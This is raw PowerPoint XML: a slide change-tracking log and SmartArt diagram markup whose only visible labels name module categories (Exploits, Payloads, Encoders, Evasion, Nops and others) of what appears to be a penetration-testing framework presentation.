        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T09:49:06.062" v="3445"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4005915166" sldId="399"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T10:42:07.607" v="2484" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4005915166" sldId="399"/>
            <ac:spMk id="2" creationId="{326611BD-5CA7-250D-7171-04B7F6654663}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T09:49:06.062" v="3445"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4005915166" sldId="399"/>
            <ac:spMk id="3" creationId="{0EE7F6FE-0C59-DE87-AD4D-E426C8319617}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T10:42:11.175" v="2485" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4005915166" sldId="399"/>
            <ac:spMk id="4" creationId="{3353B809-7057-578C-6707-91357CE7287C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-27T17:43:45.537" v="3032" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4005915166" sldId="399"/>
            <ac:spMk id="4" creationId="{69470760-08B1-89DF-0632-5409991EF987}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T10:42:14.670" v="2487" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4005915166" sldId="399"/>
            <ac:spMk id="5" creationId="{56D8BC4B-649B-C3AD-8FFA-63102E351E2A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:17:03.123" v="3873" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3163403214" sldId="400"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T09:46:56.146" v="3380" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3163403214" sldId="400"/>
            <ac:spMk id="3" creationId="{0EE7F6FE-0C59-DE87-AD4D-E426C8319617}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T09:48:58.740" v="3443" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3163403214" sldId="400"/>
            <ac:spMk id="4" creationId="{70E1AD0F-6103-8934-F149-C07E7F6D6878}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:17:03.123" v="3873" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3163403214" sldId="400"/>
            <ac:spMk id="5" creationId="{EADA9BD2-7CBD-AD88-6D19-8F3779047940}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T09:46:56.146" v="3380" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3163403214" sldId="400"/>
            <ac:picMk id="2" creationId="{3648DCBB-7897-1302-7FDF-3986BE76CDED}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T10:42:36.124" v="2491" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3826899840" sldId="400"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod ord">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:54:24.864" v="4411" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2677362145" sldId="401"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:54:24.864" v="4411" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2677362145" sldId="401"/>
            <ac:spMk id="2" creationId="{15046E0C-787A-9601-49D8-3DBFB831D408}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:31:29.259" v="4189" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2677362145" sldId="401"/>
            <ac:spMk id="3" creationId="{0EE7F6FE-0C59-DE87-AD4D-E426C8319617}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:51:39.582" v="4371" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="838474950" sldId="402"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-27T17:54:59.401" v="3073" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="838474950" sldId="402"/>
            <ac:spMk id="2" creationId="{CD844F20-C4EA-39F1-F043-63CDE48900FE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T09:49:02.731" v="3444"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="838474950" sldId="402"/>
            <ac:spMk id="3" creationId="{0EE7F6FE-0C59-DE87-AD4D-E426C8319617}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:51:39.582" v="4371" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="838474950" sldId="402"/>
            <ac:spMk id="4" creationId="{BDB6635F-D1BC-0923-E64A-0AA7C6751BCB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:31:24.397" v="4188" actId="2711"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3661595705" sldId="403"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:24:53.805" v="4110" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3661595705" sldId="403"/>
            <ac:spMk id="2" creationId="{BD9C8E86-5D14-C44C-0194-F72208B4E50D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:31:24.397" v="4188" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3661595705" sldId="403"/>
            <ac:spMk id="3" creationId="{0EE7F6FE-0C59-DE87-AD4D-E426C8319617}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T10:43:28.051" v="2508" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1999288018" sldId="404"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T10:43:28.051" v="2508" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1999288018" sldId="404"/>
            <ac:spMk id="3" creationId="{6841A15B-D575-E44D-CB98-0DDCBE8C9595}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T09:49:16.154" v="3447"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2766134720" sldId="405"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T11:51:08.440" v="2656" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2766134720" sldId="405"/>
            <ac:spMk id="2" creationId="{894F6F77-717F-49DA-EB37-150FAA4A11BE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T09:49:16.154" v="3447"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2766134720" sldId="405"/>
            <ac:spMk id="3" creationId="{3F62D435-4874-76F6-82E2-3C5F37A5AACC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T11:51:12.377" v="2657" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2766134720" sldId="405"/>
            <ac:spMk id="4" creationId="{8F07D4AF-EFC9-A83D-1FC2-09352F7C5E4F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T11:41:21.767" v="2584"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2766134720" sldId="405"/>
            <ac:spMk id="7" creationId="{6C0991F5-C0D4-69AF-ADA2-3E0685935705}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T11:48:10.838" v="2655" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2766134720" sldId="405"/>
            <ac:spMk id="8" creationId="{B4671555-B592-2427-E201-5B3FA0168AAA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del ord">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T12:14:52.076" v="4670" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3699519113" sldId="406"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod ord">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T12:08:09.624" v="4665" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="219718230" sldId="407"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:59:29.842" v="4471" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="219718230" sldId="407"/>
            <ac:spMk id="2" creationId="{F25592C1-92A0-1BCB-A7AB-99948EED7665}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T12:00:58.559" v="4476" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="219718230" sldId="407"/>
            <ac:spMk id="3" creationId="{6E73DBEC-3F6C-EDCD-9E30-618E89748177}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T12:08:09.624" v="4665" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="219718230" sldId="407"/>
            <ac:spMk id="4" creationId="{5F0559B7-E89A-1504-FD74-DDF419F0EF0D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T12:03:30.703" v="4485" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="219718230" sldId="407"/>
            <ac:spMk id="5" creationId="{9EE1A218-8A09-05BD-E034-7941259EF386}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:58:07.845" v="4432" actId="2890"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3877081100" sldId="408"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:58:10.713" v="4433" actId="2890"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3278215920" sldId="409"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:58:12.621" v="4434" actId="2890"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2314504889" sldId="410"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:58:15.366" v="4435" actId="2890"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2322991436" sldId="411"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:58:17.553" v="4436" actId="2890"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3280059709" sldId="412"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:58:20.154" v="4437" actId="2890"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1344184687" sldId="413"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add ord">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T12:17:13.171" v="4676"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3382263111" sldId="414"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
</pc:chgInfo>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dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="tx1">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t>Exploits</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5D70EFF5-8B31-4A1F-AE44-51E4CF0013EB}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="108000" tIns="648000" rIns="288000" anchor="t" anchorCtr="0"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPts val="1500"/>
            </a:lnSpc>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>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dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="tx1">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t>Post</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lIns="108000" tIns="648000" rIns="288000" anchor="t" anchorCtr="0"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPts val="1500"/>
            </a:lnSpc>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>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dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="tx1">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t>Auxiliary</a:t>
          </a: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US" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="tx1">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t>Payloads</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US" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="tx1">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t>Encoders</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648000" rIns="288000" anchor="t" anchorCtr="0"/>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86FD68DD-D247-4303-8997-5C9A9F43FECE}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="108000" tIns="648000" rIns="288000" anchor="t" anchorCtr="0"/>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gm:t>
    </dgm:pt>
    <dgm:pt modelId="{B65E2892-57B2-4F6C-9E9B-C595F9A598FB}" type="parTrans" cxnId="{020EFE77-4B55-461E-B919-97D7B3DA6E8D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E25E5E0E-9826-47E4-8DF9-BCB8A45D3729}" type="sibTrans" cxnId="{020EFE77-4B55-461E-B919-97D7B3DA6E8D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B4345CFE-3004-4D24-B6C2-C67D1EED219B}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="108000" tIns="648000" rIns="288000" anchor="t" anchorCtr="0"/>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gm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F207147-3561-472E-92A2-6FEF8ECD07D7}" type="parTrans" cxnId="{BA0ABA76-FF18-4415-849F-D4B38C350E93}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{717FDA12-8F8C-4D3C-AB00-E43DAE2A4310}" type="sibTrans" cxnId="{BA0ABA76-FF18-4415-849F-D4B38C350E93}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E240D90-8E1A-4F63-B4BF-AD836BC8CABE}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="108000" tIns="648000" rIns="288000" anchor="t" anchorCtr="0"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="533400">
            <a:lnSpc>
              <a:spcPts val="1500"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Evasion</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91CF1FEA-9B1F-41C9-BD47-F12398EF396E}" type="parTrans" cxnId="{1817C62D-0D73-4E47-B7D6-AE086C396641}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A85F317-9C5E-4F83-B1E6-E2E4FC322255}" type="sibTrans" cxnId="{1817C62D-0D73-4E47-B7D6-AE086C396641}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{790D3BF4-F696-4B4B-9646-FDD001B1295D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="108000" tIns="648000" rIns="288000" anchor="t" anchorCtr="0"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="533400">
            <a:lnSpc>
              <a:spcPts val="1500"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Nops</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AEEDC74F-8E18-4816-B12B-06BF07A8F850}" type="parTrans" cxnId="{6D7998BB-4F79-4AAA-AC1D-81C4BA510D64}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE35B69B-B7CB-4434-B985-DFF4578C2BE8}" type="sibTrans" cxnId="{6D7998BB-4F79-4AAA-AC1D-81C4BA510D64}">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7">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7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{810D7AA7-A541-4507-BE7F-36CCF210089F}" type="pres">
      <dgm:prSet presAssocID="{AACEAFD5-63CF-4AFC-B46F-BE086C5D447C}" presName="desTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="7">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7">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7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5E07F9E4-149C-4A89-848F-4ABDD305F0C5}" type="pres">
      <dgm:prSet presAssocID="{D07AD3FD-84FF-467E-9693-752776549C61}" presName="desTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="7">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7">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7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FD7B29F2-0D66-4B4B-BC8A-82DA23575305}" type="pres">
      <dgm:prSet presAssocID="{D71FC021-6A65-44D1-95B9-0E6C89079866}" presName="desTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="7">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7">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7" custLinFactNeighborX="1250">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1D84544C-5924-422B-9546-A86AE4927E4C}" type="pres">
